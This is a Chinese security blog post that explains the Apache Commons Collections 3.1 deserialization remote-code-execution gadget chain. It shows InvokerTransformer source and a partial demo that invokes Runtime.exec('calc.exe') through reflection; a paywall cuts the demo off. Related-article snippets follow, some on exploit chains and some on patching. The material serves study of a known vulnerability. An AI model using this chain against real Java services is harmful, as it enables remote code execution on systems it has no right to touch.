[java安全]CommonsCollections3.1

最新推荐文章于 2024-06-26 07:00:00 发布
原创 最新推荐文章于 2024-06-26 07:00:00 发布 · 3.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #安全 #开发语言

文章详细介绍了ApacheCommonsCollections库中的安全问题,特别是如何通过InvokerTransformer、ConstantTransformer和ChainedTransformer等工具类构建命令执行链,最终触发TransformedMap的checkSetValue()方法,实现反序列化远程代码执行(RCE)。通过创建特定的链式转换器并结合AnnotationInvocationHandler,可以实现JDK1.7的RCE利用。

文章目录

【java安全】CommonsCollections3.1

java开发过程中经常会用到一些库。Apache Commons Collections提供了很多的集合工具类。

很多项目会使用到该库,可以通过相关的调用链,触发Commons Colletions 反序列化RCE漏洞

接下来我们介绍一些重要的类

InvokerTransformer

这个InvokerTransformer类可以使用transform()方法使用反射机制调用任意函数

我们首先看一看构造方法:

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
   
   
        this.iMethodName = methodName;
        this.iParamTypes = paramTypes;
        this.iArgs = args;
    }

为参数赋初值

transform()方法

public Object transform(Object input) {
   
   
        if (input == null) {
   
   
            return null;
        } else {
   
   
            try {
   
   
                Class cls = input.getClass();
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                return method.invoke(input, this.iArgs);
            }
            ...
        }
    }

该方法会使用反射机制,将传入的对象input使用getClass()方法获取Class对象,然后使用getMethod()获取方法的Method对象,最后传参invoke()调用函数

那么我们就可以通过InvokerTransformer这么执行命令

import org.apache.commons.collections.functors.InvokerTransformer;

public class InvokerTransformerDemo {
   
   
    public static void main(String[] args) throws Exception {
   
   
        //Class runtimeClass=Class.forName("java.lang.Runtime");
        //Object runtime=runtimeClass.getMethod("getRuntime").invoke(null);
        //runtimeClass.getMethod("exec", String.class).invoke(runtime,"calc.exe");

        Class runtimeClass=Class.forName("java.lang.Runtime");// Runtime的类对象

        //借助InvokerTransformer调用runtimeClass的getMethod方法,参数是getRuntime,最后返回的其实是一个Method对象即getRuntime方法
        Object m_getMethod=new InvokerTransformer("getMethod",new Class[] {
   
   
                String.class,Class[].class},new Object[] {
   
   
                "getRuntime",null
        }
        ).transform(runtimeClass);

        //借助InvokerTransformer调用m_getMethod的invoke方法,没有参数,最后返回的其实是runtime这个对象
        Object runtime=new InvokerTransformer("invoke",new Class[] {
   
   
                Object.class,Object[].class},new Object[] {
   
   
                null,null
        }
        ).transform(m_getMethod);

        //借助InvokerTransformer调用runtime的exec方法,参数为calc.exe,返回的自然是一个Process对象
        Object exec=new InvokerTransformer("exec",new Class[] {
   
   
                String.class},new Object[] {
   
   
                "calc.exe"
        }
        )
最低0.47元/天 解锁文章
Tr4n
关注
CommonsCollections1
qq_63928796的博客
03-16 1471
是Apache软件基金会的项目,曾经隶属于Jakarta项目。Commons的目的是提供可重用的、解决各种实际的通用问题且开源的Java代码。Proper(是一些已发布的项目)、Sandbox(是一些正在开发的项目)和Dormant(是一些刚启动或者已经停止维护的项目)。包为Java标准的提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。让我们在开发应用程序的过程中,既保证了性能,同时也能大大简化代码。
commons-collections3(cc3)反序列化链分析
遇事不决冲冲冲
03-10 2913
commons-collections3反序列化 cc3链和cc1想法还是很相似的,然后构造恶意类和调用使用了不同的两个新类 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
commons-collections-3.1.zip jar包
02-01
java jar包,亲测试可用 安全,可以对其进行数字签名,只让能够识别数字签名的用户使用里面的东西。 加快下载速度; 压缩,使文件变小,与ZIP压缩机制完全相同。 包封装。能够让JAR包里面的文件依赖于统一版本的类文件。 可移植性,能够在各种平台上直接使用。 把一个JAR文件添加到系统的classpath环境变量之后,java通常会把这个JAR文件当做一个路径来处理。通常使用jar命令来压缩,可以把一个或多个路径全部压缩成一个JAR文件。
commons-collections-3.1.jar
12-10
commons-collections-3.1.jar
apache-collections-commons-collections-3.1.jar.zip
07-18
标签:apache-collections-commons-collections-3.1.jar.zip,apache,collections,commons,collections,3.1,jar.zip包下载,依赖包
java--CommonsCollections3基础学习
zyer
05-20 1170
唉,做事不细心,浪费好光阴啊!由于对java的了解甚少,于是我还是像以前那样随便使用的ysoserial和下载的commonscollections4.4进行漏洞利用,发现在jdk1.7时会提示Templates有问题,在jdk1.8还没有任何反应,然后通过不断的寻找,最后发现了原因,原来测试环境是: JDK 1.7 Commons Collections 3.1 推荐使用maven搭建,引入依赖 <dependencies> <dependency>
Java反序列化漏洞Apache CommonsCollections分析
洋洋的小黑屋
05-17 639
Java反序列化漏洞Apache CommonsCollections分析 cc链,既为Commons-Collections利用链。此篇文章为cc链的第一条链CC1。而CC1目前用的比较多的有两条链,LazyMap和TransformedMap。在ysoserial工具中,利用的是LazyMap链,而我们此篇分析的则是TransformedMap链。 1.本文所需前置知识 java反序列化基础...
Java安全CommonsCollections4
Java_ttcd的博客
08-17 468
PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口。这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。这里用到的是该类的add方法,将指定的元素插入此优先级队列。..
【无标题】Java安全CommonsCollections4
AS011x的博客
08-17 308
这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。...
Collections扩展——commons
微笑的丁总的个人博客
07-15 207
一、下载 http://commons.apache.org/collections/ 二、文档制作:HugeChm 三、扩展 1、解耦 函数式编程 1)、Predicate 断言 封装条件或判别式 if..else替代 a)、 new EqualPredicate<类型>(值) EqualPredicate.equalPredicate(值); b)、NotNul...
commons-collections
04-23
collections jar 包集合,使用Maven的可以直接使用!collections
commons-collections-3.2.2-
11-01
用来修补weblogic的反序列化漏洞,重命名后替换之前Middleware\modules下的的3.2.0版
commons-collections-3.2.2、4-4.1
11-07
修复weblogic反序列化漏洞,修复方法为:替换原来的common-collections组件,建议:原来是3.2.d就替换为3.2.2,原来是4.x,就替换为4.4.1,如果出现不兼容,则替换一个版本试试。 1.先停止weblogic 2.替换oracle\modules目录里的com.bean.core.apache.commons.collections_x.x.x.jar 3.启动weblogic
[java安全]CommonsCollections2
leekos的博客,分享web安全相关知识~
07-20 831
是一个重要的辅助开发库。包含了⼀些Java中没有的数据结构和和辅助方法,不过随着Java 9以后的版本中原⽣库功能的丰富,以及反序列化漏洞的影响,它也在逐渐被升级或替代。在2015年cc链被提出时,commons-collections:commons-collections(当时版本3.2.1)org.apache.commons:commons-collections4(当时版本4.0)
Commons Collections4&Commons Collections5
ki10Moc的博客
12-15 504
java安全cc4&cc5
Java反序列化漏洞——CommonsCollections4.0版本—CC2、CC4
Thunderclap的博客
02-18 2067
因为这条利⽤链中的关键类org.apache.commons.collections4.comparators.TransformingComparator ,在commonscollections4.0以前是版本中是没有实现Serializable 接⼝的,⽆法在序列化中使⽤。实际上是可用的,比如CC6的链,引入的时候因为⽼的Gadget中依赖的包名都是org.apache.commons.collections ,⽽新的包名已经变。其他的代码不需要改变,即可创建出新版本下的利用链。
Commons-collection
daocrens的专栏
04-05 1465
Commons项目理解        在java项目中有很多公用的算法实现和工具类        jarkata项目组把这些公用的东西作为开源项目加以实现        以后在项目使用中就可以统一算法,不必写象StringUtil或者DateHelper之类的工具类了        很多算法也不必再查文档,熬夜写个通宵了,:)        最近需要针对collection作一些扩展,自己写了半天
commons-collections1-3分析
hongduilanjun的博客
03-11 366
CC1分析 POC: import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTrans
Commons-Collections篇-CC5链分析
最新发布
鸣蜩十四的博客
06-26 816
CC5链和CC1差不多,只不过调用LazyMap.get()是通过TiedMapEntry.toString()触发的
Java Servlet规范3.1深度解析
"Servlet3.1规范,深入学习Servlet的宝贵资料,由Shing Wai Chan和Rajiv Mordani撰写,穆茂强和张开涛翻译,属于JavaEE7平台的一部分,旨在为Java Servlet API提供清晰的标准定义。文档包含了参考实现和兼容性测试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值